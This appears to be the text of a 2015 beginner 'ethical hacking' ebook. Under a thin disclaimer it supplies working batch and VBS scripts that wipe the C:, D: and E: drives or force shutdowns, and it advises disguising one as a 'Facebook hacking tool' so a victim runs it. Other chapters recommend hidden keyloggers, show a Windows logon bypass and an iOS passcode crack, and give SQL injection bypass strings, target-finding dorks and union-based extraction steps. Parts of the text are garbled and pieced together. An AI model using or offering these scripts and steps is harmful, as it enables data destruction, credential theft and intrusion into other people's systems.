Hack X Crypt (2015)
Hack X Crypt (2015)
UJJWAL SAHAY
CO-FOUNDER
[www.thebigcomputing.com]
TheBigComputing.com
We cover unique Ethical Hacking and Performance improvement guides, News and Tutorials. Our aim is to make your
digital life easy, pleasant and secure. Ujjwal is a regular author and also chief security administrator
LEGAL DISCLAIMER
Any proceedings or activities regarding the material contained within this volume are
exclusively your liability. The misuse and mistreat of the information/tutorial in this book
can consequence in unlawful charges brought against the persons in question. The authors
and review analyzers will not be held responsible in the event any unlawful charges
brought against any individuals by misusing the information in this book to break the law.
This book contains material and resources that can be potentially destructive or dangerous.
If you do not fully comprehend something on this book, dont study this book. Please refer
to the laws and acts of your state/region/ province/zone/territory or country before
accessing, using, or in any other way utilizing these resources. These materials and
resources are for educational and research purposes only. Do not attempt to violate the law
with anything enclosed here within. If this is your intention, then leave now. Neither writer
of this book, review analyzers, the publisher, nor anyone else affiliated in any way, is
going to admit any responsibility for your proceedings, actions or trials.
CRYPT (A straight forward guide towards Ethical hacking and cyber security). Also,
Ujjwal Sahay is the Co-founder of the techno-hacking website
www.thebigcomputing.com, he is the chief security consultant of site.
Sahay is however, more well known for his significant work in the field of ethical hacking
and cyber security. Sahay is currently pursuing his studies in computer science with
specialization in cyber security at MITS GWALIOR.
Get In Touch With Him At
PREFACE
Computer hacking is the practice of altering computer hardware and software to carry out
a goal outside of the creators original intention. People who slot in computer hacking
actions and activities are often entitled as hackers. The majority of people assume that
hackers are computer criminals. They fall short to identify the fact that criminals and
hackers are two entirely unrelated things. Hackers in realism are good and extremely
intelligent people, who by using their knowledge in a constructive mode help
organizations, companies, government, etc. to secure credentials and secret information on
the Internet. Years ago, no one had to worry about Crackers breaking into their computer
and installing Trojan viruses, or using your computer to send attacks against others. Now
that thing have changed, its best to be aware of how to defend your computer from
damaging intrusions and prevent black hat hackers. So, in this Book you will uncover the
finest ways to defend your computer systems from the hackers This Book is written by
keeping one object in mind that a beginner, who is not much familiar regarding computer
hacking, can easily, attempts these hacks and recognize what we are trying to demonstrate.
After Reading this book you will come to recognize that how Hacking is affecting our
everyday routine work and can be very hazardous in many fields like bank account
hacking etc. Moreover, after carrying out this volume in detail you will be capable of
understanding that how a hacker hacks and how you can defend yourself from these
threats.
FOR ANY QUERIES AND SUGGESTIONS FEEL FREE TO CONTACT ME:
[email protected]
ACKNOWLEDGEMENTS
Book or volume of this temperament is tremendously complex to write, particularly
without support of the Almighty GOD. I am highly thankful to LATE DR. BAKSHI
KAMESHWAR SRIVASTAVA, MRS. SHASHI BALA SRIVASTAVA, Mr. BAKSHI
RAJESH PRASAD SINHA AND MRS. ARADHNA SINHA to trust on my capabilities,
without their support and motivation it would not be promising to write this book. I
express heartfelt credit to My Parents LATE PROF. SAMIR KUMAR SAHAY and
MRS.SUMAN SAHAY without them I have no existence. I am also thanking MR.
BAKSHI RAJEEV PRASAD SINHA, MRS. ANITA SINHA, MR. BAKSHI SANJEEV
PRASAD SINHA, MRS.PRITY SINHA, MR. RAJESHWAR PRASAD and MRS.
PUNAM SINHA who helped me at each and every step of my life by their precious
support.
I am more than ever thankful to my colleague Saurabh Tripathi (Creative head @ THE
BIG COMPUTING) for the review, analysis and suggestions for some good articles for
this book and all individuals who facilitated me at various research stages of this volume.
UJJWAL SAHAY
FOOLISH ASSUMPTIONS
I make a few assumptions about you:
Youre familiar with basic computer-, networking related concepts and terms.
You have a basic understanding of what hackers and malicious users do.
You have access to a computer and a network on which to use these techniques.
You have access to the Internet to obtain the various tools used in the ethical hacking
process.
You have permission to perform the hacking techniques described in this book.
Table of Contents
INTRODUCTION TO
HACKERS.. 17
Communities of Hackers:- ..
17
INTENSION OF HACKERS:
17
Types of Hackers:
. 18
White Hat Hackers
.. 18
Black Hat Hackers
18
Grey Hat
Hackers.. 18
CRACKERS
19
Intension of crackers:-
19
PHREAKS
19
Intention of phreaks:-..
19
SCRIPT KIDDIES: 20
Intention of script kiddies:-.
20
Black Hat Hackers Strategy:- 20
HACKERS WANT YOUR
PC.. 23
CREATION OF VIRUS IN NOTEPAD
.. 26
29
3.) To format C, D: and E: drive of your computer:- 30
4.) Convey your friend a little message and shut down his / her computer:. 30
5.) Open Notepad, slowly type Hello, how are you? I am good thanks and freak your
friend out:- .. 31 6.) Hack your
friends keyboard and make him type You are a fool simultaneously:.. 33
7.) Open Notepad continually in your friends computer:. 33
8.) THRETEN YOUR FRIEND BY MAKING SCREEN FLASH .. 34
Convert Batch files into Executable Programs.. 37
HACKING OPEN OPTION
.. 42
PASSWORD CRACKING
.. 50
Cracking passwords with hardcore tools 51
Password-cracking software:- 51
Cain & Abel:. 51
Brutus:.
52
Elcomsoft Distributed Password Recovery: 52
Elcomsoft System Recovery:. 52
John the Ripper
.. 52
ophcrack
..
53
Aircrack-NG
.. 53
Proactive System Password Recovery. 53
Rainbow Crack
53
pwdump3
54
PASSWORD CREATING
POLICIES.. 57
BYPASS WINDOWS LOGON SCREEN PASSWORD. 60
KEYSTROKE LOGGING
. 63
Learn How to Hack Windows Experience Index 66
HACK TO HIDE LOCAL DRIVES
. 71
FORMAT HARD DISK WITH NOTEPAD .
78
FUNNY VIRUS TO SHOCK YOUR FRIENDS.
81
HOW TO CHANGE YOUR PROCESSOR NAME 85
HOW TO MAKE YOUR GOOGLE SEARCHS EFFECTIVE 93
IOS PASSWORD
CRACKING. 96
HACK TO HIDE THE RECYCLE
BIN..103
HOW BOTNET DDoS ATTACK WORKS
106
DDoS Attack?
106
Botnet?
..107
Botnet
Tools..108
SlowLoris..1
Tors Hammer
..109
Qslowloris
109
Apache
Killer..110
PyLoris
110
DDoSim
..110
Botnet DDoS
Attacks.110
WEBSITE
HACKING..113
TESTING SQL INJECTION BY USING TOOL
..130
WI-FI HACKING USING
BACKTRACK.134
NEWBIES WAY TOWARDS REVERSE ENGINEERING ..143
EMAIL AND FACEBOOK HACKING BY PHISHING..149
Securing Pen Drives From Malicious Viruses155
HOW TO PROTECT YOUR PDF FILES FROM COPYING.160
SENDING A MESSAGE TO OTHER USER IN YOUR PC ..166
HOW TO CREATE A FOLDER WITH EMPTY NAME..170
HACKING ANDROID
PHONE.173
FULL CONTROL YOUR PC BY
PHONE..178
LAUNCHING WINDOWS GOD MODE
183
HOW TO CRACK ANDROID LOCK
SCREEN..187
WI-FI CRACKING USING REAVER IN BACKTRACK 191
SOME USEFUL WINDOWS SHORTCUTS ..196
HOW TO RECOVER PERMANENTLY DELETED FILES198
CONCLUSION: 203
Lets start
INTRODUCTION
INTRODUCTION TO HACKERS
First of all before digging into intense hacking processes lets take a look on what hacking
is, who the hackers are, what are their intentions, types of hackers and their communities
etc.
Communities of Hackers:
HACKERS
CRACKERS
PHREAKS
SCRIPT KIDDIES
HACKERS are the Intelligent Computer Experts.
INTENSION OF HACKERS:
To gain in-depth knowledge of any computer system, what is happening at the backend of
any specific program of the system behind the screen of the computer system?
Their motive is to find possible security risk and vulnerabilities in a computer system or
network.
They create security awareness among the people by sharing knowledge and proper
security preventions that should be taken by the user.
Types of Hackers:
White Hat Hackers White hats is the name used for security experts. While they often
use the same tools and techniques as the black hats, they do so in order to foil the bad
guys. That is, they use those tools for ethical hacking and computer forensics. Ethical
hacking is the process of using security tools to test and improve security (rather than to
break it!). Computer forensics is the process of collecting evidence needed to identify and
convict computer criminals.
Black Hat Hackers They use their knowledge and skill set for illegal activities and
destructive intents. Obviously, the black hats are the bad guys. These are the people who
create and send viruses and worms, break into computer systems, steal data, shut down
networks, and basically commit electronic crimes. We talk about black hats at several
points in this book. Black hat hackers and malware writers are not considered as the same
thing in the security communityeven though they are both breaking the law.
Grey Hat Hackers They use their knowledge and skill set for the legal and illegal
purpose. They are white hats in public but internally they do some black hat work. Gray
hats sit in the middle of the fence because sometimes they cross that ethical line (or more
often, define it differently). For example, gray hats will break into a companys computer
system just to wander around and see whats there. They think that simply because they
dont damage any data, theyre not committing a crime. Then they go and apply for jobs as
security consultants for large corporations. They justify their earlier break-in as some sort
of computer security training. Many really believe that theyre providing a public service
by letting companies know that their computers are at risk.
CRACKERS are those who break into the applications with some malicious intentions
either for their personal gain or their greedy achievements.
Intension of crackers:
Their motive is to get unauthorized access into a system and cause damage or destroy or
reveal confidential information.
To compromise the system to deny services to legitimate users for troubling, harassing
them or for taking revenge.
It can cause financial losses & image/reputation damages, defamation in the society for
individuals or organizations.
PHREAKS are those people who use computer devices and software programs and their
tricky and sharp mind to break into the phone networks.
Intention of phreaks:
To find loopholes in security in phone network and to make phone calls and access
internet at free of cost!!!
You may get a spoofed call or a big amount of bill. You can also get a call with your
own number.
SCRIPT KIDDIES: These are computer novices who take advantage of the hacker tools,
vulnerability scanners, and documentation available free on the Internet but who dont
have any real knowledge of whats really going on behind the scenes. They know just
enough to cause you headaches but typically are very sloppy in their actions, leaving all
sorts of digital fingerprints behind. Even though these guys are the stereotypical hackers
that you hear about in the news media, they often need only minimal skills to carry out
their attacks.
Intention of script kiddies:
They use the available information about known vulnerabilities to break into the network
systems.
Its an act performed for a fun or out of curiosity.
Black Hat Hackers Strategy:
Information Gathering & Scanning
Getting Access on the website
Maintain the access
Clear the Tracks
Conclusion: Security is important because prevention is better than cure.
VIRUS CREATIONS
Now when you have copied the codes in the notepad your next work is to save the text
document you have created.
Go to fileoptionandsave your document by any namebutdontforget to keep the extension
as .bat.
For example you can save your text document by the nameujjwal.bat
Or you can also keep your document name as Facebook hacking tool.bat to confuse the
victim and enforce him to open the virus you have created to destroy the desktop of the
victim.
When you have done saving the document just double click on the batch file to open it.
Suddenly you will see that the command prompt of the victims computer opened
automatically and it will display large amount of codes to running in the command
prompt.
After 5-10 seconds you will see that there are a huge amount of folders created
automatically on the desktop of the victim and it will also leads the desktop to freeze or
crash.
2.) To create more folders in C, D, and E drive of victims computer:As we have learned above to create many folders on the desktop of the victim, in the same
way we can create a lot of folders in the C:, D:, and E: drives of the victims computer by
applying the same method as we have followed above but there is a little amendment in
the codes of the batch file of this virus.
CODES:
@echo off
:VIRUS
cd /d C:
md%random%
cd /d D:
md%random%
cd /d E:
md%random%
goto VIRUS
Copy and paste the above code in the notepad and follow the same steps as we have
followed before to create more numbers of folders in the local drives of the victims
computer.
3.) To format C, D: and E: drive of your computer:
Open Notepad
Copy the below command there
rd/s/q D:\
rd/s/q C:\
rd/s/q E:" (Without quotes)
Save as anything.bat
Double click on the virus icon.
This virus formats the C, D and E Drive in 5 Seconds.
4.) Convey your friend a little message and shut down his / her computer:
@echo off
msg * I dont like you
shutdown -c Error! You are too stupid! -s
Save it as Anything.BAT in All Files and send it.
5.) Open Notepad, slowly type Hello, how are you? I am good thanks and freak your
friend out:
Open the notepad and type the following code :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(WScript.Shell)
WshShell.Run notepad
WScript.Sleep 100
WshShell.AppActivate Notepad
WScript.Sleep 500
WshShell.SendKeys Hel
WScript.Sleep 500
WshShell.SendKeys lo
WScript.Sleep 500
WshShell.SendKeys , ho
WScript.Sleep 500
WshShell.SendKeys w a
WScript.Sleep 500
WshShell.SendKeys re
WScript.Sleep 500 WshShell.SendKeys you WScript.Sleep 500
WshShell.SendKeys ? WScript.Sleep 500
WshShell.SendKeys I a WScript.Sleep 500
WshShell.SendKeys m g WScript.Sleep 500
WshShell.SendKeys ood WScript.Sleep 500
WshShell.SendKeys th WScript.Sleep 500
WshShell.SendKeys ank WScript.Sleep 500
WshShell.SendKeys s!
Save it as Anything.VBS and send it.
6.) Hack your friends keyboard and make him type You are a fool simultaneously:
Open the notepad and type the following codes:
Set wshShell = wscript.CreateObject(WScript.Shell) do
wscript.sleep 100
wshshell.sendkeys You are a fool.
loop
Save it as Anything.VBS and send it.
7.) Open Notepad continually in your friends computer:
Open the notepad and type the following codes:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as Anything.BAT and send it.
8.) THRETEN YOUR FRIEND BY MAKING SCREEN FLASH
To make a really cool batch file that can make your entire screen flash random colors until
you hit a key to stop it, simply copy and paste the following code into notepad and then
save it as a .bat file.
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg echo e110 DF 88
C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg echo e120 FB EC A8 08 74 FB
BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg echo e130 C8 EE B4 01 CD 16 74 CD B8 03
00 CD 10 C3>>\z.dbg echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which
will do the same thing except when they press a key the screen will go black and the only
way to stop the batch file is by pressing CTRL-ALT-DELETE.
Codes:
@echo off :a echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg echo
e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg echo e120 FB EC
A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg echo e130 C8 EE B4 01 CD 16
74 CD B8 03 00 CD 10 C3>>\z.dbg echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
To disable error (ctrl+shirt+esc) then end process wscript.exe Enjoy!!! Note: - some of the
above given codes can harm your computer after execution so; dont try it on your pc. You
Another interesting and compactible feature is that you can choose the language for your
EXE file, the choices being English or German. From the Options tab, users can opt to
create a visible or invisible application, which means displaying a console window or not.
However, if you want to encrypt the resulting EXE file, you can protect it with a security
password.
Then a window will open in front of you of registry editing. It has five options.
1. HKEY_CLASSES_ROOT
2. HKEY_CURRENT_USER
3. HKEY_LOCAL_MACHINE
4. HKEY_USERS
5. HKEY_CURRENT_CONFIG
Then you have to click on HKEY_CLASSES_ROOT It will open and you see a lot of
items under it.
Search for the FOLDER option under it.
(www.elcomsoft.com/pspr.
html) recovers practically any locally stored Windows password, such As logon
passwords, WEP/WPA passphrases, SYSKEY passwords, and RAS/dialup/VPN
passwords.
Rainbow Crack : - (http://project-rainbowcrack.com) Rainbow Crack is a hash cracker
tool that uses a large-scale time-memory trade off process for faster password cracking
than traditional brute force tools. Time-memory tradeoff is a computational process in
which all plain text and hash pairs are calculated by using a selected hash algorithm. After
computation, results are stored in the rainbow table. This process is very time consuming.
But, once the table is ready, it can crack a password must faster than brute force tools.
You also do not need to generate rainbow tablets by yourselves. Developers of Rainbow
Crack have also generated LM rainbow tables, NTLM rainbow tables, MD5 rainbow
tables and Sha1 rainbow tables. Like Rainbow Crack, these tables are also available for
free. You can download these tables and use for your password cracking processes.
pwdump3 :-(www.openwall.com/passwords/microsoftwindowsnt-2000-xp-2003-vista7#pwdump) password hashes from the SAM (Security database.
extracts Accounts Windows Manager)
Password storage locations vary by operating system:
Windows usually stores passwords in these locations:
Active Directory database file thats stored locally or spread across domain controllers
(ntds.dit)
Windows may also store passwords in a backup of the SAM file in the c:\winnt\repair or
c:\windows\repair directory.
Security Accounts Manager (SAM) database (c:\winnt\ system32\config) or
(c:\windows\system32\config)
Some Windows applications store passwords in the Registry or as plaintext files on the
hard drive! A simple registry or file-system search for password may uncover just what
youre looking for.
Linux and other UNIX variants typically store passwords in these files:
/etc/passwd (readable by everyone)
/etc/shadow (accessible by the system and the root account only)
/.secure/etc/passwd (accessible by the system and the root account only)
/etc/security/passwd (accessible by the system and the root account only)
KONBOOT
BYPASS WINDOWS LOGON SCREEN PASSWORD
Sometimes it creates a critical condition if you forgot your Windows administrator
password and its quite urgent to recover it without any flaw. This article will make it
convenient to recover your admin password.
We are using a tool named as KON-BOOT.
Kon-Boot is an application which will bypass the authentication process of Windows
based operating systems. It enables you login in to any password protected test machine
without any knowledge of the password.
Kon-Boot works with both 64-bit and 32-bit Microsoft Windows operating systems.
Needy things:
A Pen Drive or Any USB Device such as Memory Card or a blank CD. Kon-Boot (Latest
version)
Your 5 minutes and also a working mind.
Technical instructions:
1. Download KON-BOOT from internet.
2. Extract the ZIP and run the KonBootInstaller.exe
3. Burn the ISO.
4. Boot from CD/USB device.
5. After Windows is loaded it will show you a Kon-boot screen.
6. Leave the password box empty and just hit OK it will directly enable you into the
windows account.
Limitations:
IT MAY CAUSE BSOD (NOTEPAD PARTICULAR BUGS).
KEYLOGGERS
BE AWARE
KEYSTROKE LOGGING
One of the best techniques for capturing passwords is remote keystroke logging the use
of software or hardware to record keystrokes as theyre typed into the computer.
Generally you use to ask your friends or relatives for logging in into your account by their
computers.
So, be careful with key loggers installed in their computers. Even with goodintentions,
monitoringemployees raises various legal issues if its not done correctly. Discuss with
yourlegal counsel what youll be doing, ask for their guidance, and get approval from
upper management.
Logging tools: - With keystroke-logging tools, you can assess the log files of your
application to see what passwords people are using:
Keystroke-logging applications can be installed on the monitored computer.
I suggest you to check out family key logger by (www.spyarsenel.com).
Another popular tool is Invisible Key Logger Stealth; Dozens of other such tools are
available on the Internet.
One more you can checkout is KGB employee monitor is one of the favorite of me
..Because it is not only invisible but it will also not shown by your task manager and it
uses password protection too.
Hardware-based tools, such as Key Ghost (www.keyghost.com), fit between the keyboard
and the computer or replace the keyboard altogether.
A keystroke-logging tool installed on a shared computer can capture the passwords of
every user who logs in.
PREVENTIONS:
The best defense against the installation of keystroke-logging software on your systems is
to use an anti-malware program that monitors the local host. Its not foolproof but can
help. As for physical key loggers, youll need to visually inspect each system.
The potential for hackers to install keystroke-logging software is another reason to ensure
that your users arent downloading and installing random shareware or opening
attachments in unsolicited emails. Consider locking down your desktops by setting the
appropriate user rights through local or group security policy in Windows.
You will need to open the file ending with Formal.Assessment (Initial).WinSAT
Open the file in notepad. You will see the following window:
In the notepad window you dont need to do too down to hunt anything, simply change the
values according to your will in the upper area. The values are written between tags. Such
as
<MemoryScore>5.9</MemoryScore>
Change the values between tags and save the files. Next time you will open the Windows<
Experience Index the values will be changed.
OFF THE ROAD TIP: For more fun we suggest everyone to keep their Scores realistic
(Not 7.9 Exactly)
To revert the changes you can re-run the assessment.
Then you will see in the left part of the window there is a USER
CONFIGURATION option.
Under the user configuration option there are three options :1.) Software settings
2.) Windows settings
3.) Administrative templates
Just give a single click on the administrative template option. You see that some
options are made available in the right part of the window.
Open the all settings option.
When you opened the all settings options there is a list of lot of options displayed after
you!
Clickon the settings option to arrange them then alphabetically. If already arranged
Now clicking sometimes the H key of your keyboard search for the hide these
specified drives in my computer option.
ENABLE it and choose for the drives which you want to hide from the given options
in the lower left part of the window.
After applying the settings just click on ok and you see the drives will hide according to
your choice.
I have selected to hide only A, B, C and D drives only so the E: drive will not be hidden
in the screenshot given below.
EMPTY HDD
FORMAT HARD DISK WITH NOTEPAD
In this article we are going to learn how to delete completely your C: drive of your
computer without a formatting compact disk. Just do it on your own risk because it will
destroy the windows of you system and for this I am not responsible.
FOLLOW THE BELOW STEPS TO FORMAT YOU C: DRIVE:_
Open the notepad and type the following give code
CODE:
@echo off del C:\ *.* \y
Now either you click on ok or you close the above message box, it will again show you
a message click ok to format.
And I am sure that you will not going to click on ok.
But again it does not matter if you click on ok or close the box, but I am sure that you will
close the box.
Again it will show you a message that all your data has been deleted.
And for a moment your friends heartbeat are going to be on the optimum.
So this is a funny way to shock your friends without harming them actually.
DO YOU HAVE i7
?
HOW TO CHANGE YOUR PROCESSOR NAME
The trick we are going to learn here is the most interesting trick and I am sure that it will
increase your prestige among your friends. Because now these days its a big deal among
the group of your friend that if you have i3, i5 or i7 processor.
So lets learn how to change your pc from any of core processor to i7.
For it you have to follow these steps:
First of all you have to go on the run option and write regedit to open the registry
editor of your computer and click on ok
It will open the registry editing window after you.
Then open the Description option and then open the system option. Also open the
central processor option under system option.
Open the processor name string giving a double click on it. A dialogue box will open
after you.
In the value data text box it is written what your computers processor actually is.
I am using Pentium(R) Dual-Core CPU T4500 @ 2.30GHz as written in the value data.
Now delete those texts and write your own text replacing them.
Such as you can writeIntel(R)Core i7CPU T9500 @ 2.30GHz and click on ok
option.
Now close the registry editor and lets checkif it is working or not. For checking it, you
have to check the properties of your computer.
For checking it, just give a right click on my computer icon and click on the properties
option which is the last option of the dialogue box.
GOOGLE
HOW TO MAKE YOUR GOOGLE SEARCHS EFFECTIVE
In this article we are going to learn how to make our Google searches effective. If we have
to find anything on Google we use to open the Google website and start searching like if
you want to download any book on Google you use to write like this fifty shades of grey
for free. And you will find a huge amount of results on Google like 753286543567
results in 0.43 seconds and will make you difficult to find the exact working download
link of that book.
You can take some very simple steps to reduce your Google searches results.
Lets assume we have to download the same book as above mentioned.
If you use to write in the following way it will reduce your Google searches and make it
simple to find the exact download link. Write in this way in the Google searches:
You have to write your searches under double quotes.
Like: - fifty shades of grey.pdf
Note: - dont forget to apply the extension .pdf
Second method: - using GOOGLE HACKS You can also use an application name as
Google hacks. It is easily available on the net and you can download it easily by Google
searches.
3.After that the work is to do is to load the iOS Forensic Toolkit Ram disk onto the mobile
device by selecting option 2 LOAD RAMDISK:When you loaded the RAMDISK code it
allows your computer to communicate with the mobile device and run the tools which are
needed for cracking the password (among other things).
4. Now you need to select the iOS device type/model that is connected to your computer,
as shown in Figure:
I dont have iphone 6 with me now so; I have selected option 14 because I have an iPhone
4 with GSM.
After that you see the toolkit which is connecting to the device and it confirms a
successful load, as shown in Figure:
Also you will see the Elcomsoft logo in the middle of your mobile devices screen I
think it looks pretty:
6. Now if you want to crack the devices password/PIN, you have to simply select the
option 6 GET PASSCODE on the main menu:
iOS Forensic Toolkit will prompt you to save the passcode to a file. For saving the
passcode simply; you can press Enter to accept the default of passcode.txt. The cracking
process will commence and, with any luck, the passcode will be found and displayed after
you as shown in Figure:
So, having no password for phones and tablets is bad, and a 4-digit PIN such as this is also
not much better choice.
So be aware about the attacks! Get up-users-getup its time to be secured.
You can also use iOS Forensic Toolkit to copy files and even crack the key chains to
uncover the password that protects the devices backups in iTunes (option 5 GET KEYS).
PREVENTION:
For the prevention from being hacked you can refer to the chapter PASSWORD
CREATING POLICIES.
Botnet?
Sometimes observed as a Bunch of Zombies, a Botnet may be a cluster of Internetconnected computers, every of that has been maliciously condemned, sometimes with the
help of malware like Trojan Horses. Usually while not the data of the computers rightful
homeowners, these machines square measure remotely controlled by an external source
via commonplace network protocols, and often used for malicious functions, most
ordinarily for DDoS attacks.
Botnet Tools
The conceiver of a Botnet is often brought u p as a bot herder or bot master. This
individual controls the Botnet remotely, usually through associate IRC server or a channel
on a public IRC server referred to as the command and control (C&C) server. To
communicate with the C&C server, the bot master uses numerous hidden channels, as well
as apparently innocuous tools like Twitter or IM. A lot of advanced bots automatically
hunt down a lot of resources to exploit, joining a lot of systems to the Botnet during a
process referred to as scrumping. Botnet servers might continually communicate and
work with different Botnet servers, making entire communities of Botnets, with
individual or multiple bot masters. This implies that any given Botnet DDoS attack may
very well have multiple origins, or be controlled by multiple people, generally operating in
coordination, generally operating singly. Botnets area unit obtainable for rent or lease
from numerous sources,anduse of Botnets are auctionedandlistedamong attackers. Actual
marketplaces have sprung up platforms that modify commercialism in large numbers of
malware-infected PCs, which might be rented and employed in Botnet DDoS or different
attacks. These platforms offer Botnet DDoS attack perpetrators with an entire and richlyfeatured toolkit, and a distribution network additionally.Even for non-technical users,
Botnet DDoS attacking may be a viable and efficient choice to take out a competitors
web site. At intervals the crime system, Botnet DDoS attacks area unit a thought artifact,
with costs taking place, and effectiveness and class growing. A number of the foremost
common tools for initiating a Botnet DDoS attack are simply downloaded from multiple
on-line sources, and include:
SlowLoris
Especially dangerous to hosts running Apache, dhttpd, tomcat and GoAhead WebServer,
Slowloris may be a highlytargeted attack, enabling one internet server to require down
another server, while not touching different services or ports on the target network.
Tors Hammer
Is a slow post dos testing tool written in Python. It also can be run through the Tor
network to be anonymized. There are several tools for testing server readiness to resist
Botnet DDoS attacks.
Qslowloris
Uses Qt libraries to execute the ways utilized by Slowloris, providing a graphical interface
that creates the program highly simple to use.
Apache Killer
Utilizes an exploit within the Apache OS initial discovered by a Google security engineer.
Apache Killer pings a server, tells the server to interrupt up whatever file is transferred
into a huge range of little chunks, using the range variable. When the server tries to
adjust to this request, it runs out of memory, or encounters alternative errors, and crashes.
PyLoris
It is a scriptable tool for testing a services level of vulnerability to a specific category of
Denial of Service (DoS) attack
DDoSim
Which can be employed in a laboratory atmosphere to simulate a DDoS attack, and helps
live the capability of a given server to handle application-specific DDOS attacks, by
simulating multiple zombie hosts with random IP addresses that create transmission
control protocol connections.
Botnet DDoS Attacks
Botnet DDoS attacks are quickly turning into the foremost prevailing variety of DDoS
threat, growing speedily within the past year in each number and volume, consistent with
recent marketing research. The trend is towards shorter attack period, however larger
packet-per second attack volume, and therefore the overall variety of attacks according has
grownup markedly, as well. The typical attack information measure ascertained
throughout this era of 2010-2012 was five.2G bps, which is 148% above the previous
quarter. Another survey of DDoS attacks found that quite 400th of respondents old
attacks that exceeded 1G bits per second in bandwidth in 2011, and 13 were targeted by a
minimum of one attack that exceeded 10G rate. From a motivational perspective, newer
analysis found that ideologically driven DDoS attacks are on the increase, supplanting
monetary motivation because the most frequent incentive such attacks.
WEBSITE HACKING
WEBSITE HACKING
Now take your time and be serious and free before starting this article because this is the
very wide and one of the most interesting articles among all of the above chapters. We will
discuss in this chapter that how to hack any vulnerable site using SQL injection.
What is SQL Injection?
SQL injection is one of the popular web applications hacking method. Using the SQL
Injection attack, an unauthorized person can access the database of the website. Attacker
can extract the data from the Database.
What a hacker can do with SQL Injection attack?
* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server
So, here we start with bypassing login .i.e.
Authentication bypass:
In this type of SQL injection generally if we had found the Admin login page and after
that we will try to open the control panel account of the admin by passing the
authentication.
If you have the admin login page of any website then you can paste the following codes
(with quotes) to bypass the authentication of the website .generally PHP websites are
vulnerable to this injection:
You can find these types of sites simply by Google searches. You have to type like this in
the Google search bar:
www.thesitename.com/adminlogin.php? Or /admin.php? Or Wp-login.php? Etc.
After finding the login page you have to paste the following codes in both userID and
password of the admin page till it will bypassed. If not we will try the next SQL injection
i.e. union based, blind based, error based etc.
Codes to be used as both userID and password at the admin login page of vulnerable
website for bypassing authentication are as follow:
or 1=1 or x=x or 0=0 or 0=0 or 0=0 or 0=0 # or 0=0 #
or 0=0 # or x=x or x=x ) or (x=x
or 1=1 or 1=1 or 1=1 or a=a or a=a ) or (a=a ) or (a=a
hi or a=a hi or 1=1 hi or 1=1 or1=1
If the authentication bypass will not work then try the following techniques carefully and
step by step:
UNION BASED SQLi:
Finding Vulnerable Website:
To find a SQL Injection vulnerable site, you can use Google search by searching for
certain keywords. That keyword often called as GOOGLE DORK.
Some Examples:
inurl:index.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:pageid=
Now you have to Copy one of the above keyword and Google it. Here, we will get a lot of
search results with which we have to visit the websites one by one for finding the
vulnerability.
For example:
site:www.anyselectedsite.com inurl:index.php?id= Step 1: Findinging the Vulnerability:
Now let us the vulnerability of the target website. To the vulnerability, add the single
quotes() at the end of the URL and press enter.
For eg:
http://www.anyselectedsite.com/index.php?id=2
If the page remains in same page or showing that page not found, then it is not vulnerable.
If you got an error message just like this, then it means that the site is vulnerable.
You have an error in your SQL syntax; the manual that corresponds to your MySQL server
version for the right syntax to use near ' at line 1
Step 2: Finding Number of columns in the database:
Great, we have found that the website is vulnerable to SQLi attack.
Our next step is to find the number of columns present in the target Database.
For that replace the single quotes() with order by n statement.
Change the n from 1,2,3,4,,5,6,n. Until you get the error like unknown column .
For eg:
http://www.anyselectedsite.com/index.php?id=2 order by 1
http://www.anyselectedsite.com/index.php?id=2 order by 2
http://www.anyselectedsite.com/index.php?id=2 order by 3
http://www.anyselectedsite.com/index.php?id=2 order by 4 If you get the error while
trying the nth number, then number of
column is n-1.
I mean:
http://www.anyselectedsite.com/index.php?id=2 order by 1(no error shown shown)
http://www.anyselectedsite.com/index.php?id=2 order by 2(no
error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 3(no
error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 4(no
error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 5(no
error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 6(no
error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 7(no
error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 8(error
shown)
So now n=8, the number of column is n-1 i.e., 7.
In case, if the above method fails to work for you, then try to add the at the end of the
statement.
For eg:
http://www.anyselectedsite.com/index.php?id=2 order by 1-Step 3: Find the Vulnerable
columns:
We have successfully found the number of columns present in the target database. Let us
find the vulnerable column by trying the query union select columns sequence.
Change the id value to negative (i mean id=-2). Replace the columns_sequence with the
no from 1 to n-1(number of columns) separated with commas (,).
For eg:
If the number of columns is 7, then the query is as follow:
http://www.anyselectedsite.com/index.php?id=-2 union select 1, 2,3,4,5,6,7
Ifyou have applied the above method and is not working then try this:
http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7Once you execute the query, it will display the vulnerable column.
Bingo, column 3 and 7 are found to be vulnerable. Let us take the first vulnerable
column 3 . We can inject our query in this column.
Step 4: Finding version,database,user
Replace the 3 from the query with version()
For eg:
http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1, 2,
version(),4,5,6,7
Now, It will display the version as 5.0.2 or 4.3. Something likes this.
Replace the version () with database () and user() for finding the database,user
respectively.
For eg:
http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select
1,2,database(),4,5,6,7http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7If the above is not working, then try this:
http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select
It will ask you to enter string that you want to convert to MySQLCHAR(). We want to
convert the table name to MySQLChar . In our case the table name is admin.
Copy and paste the code at the end of the url instead of the mysqlchar
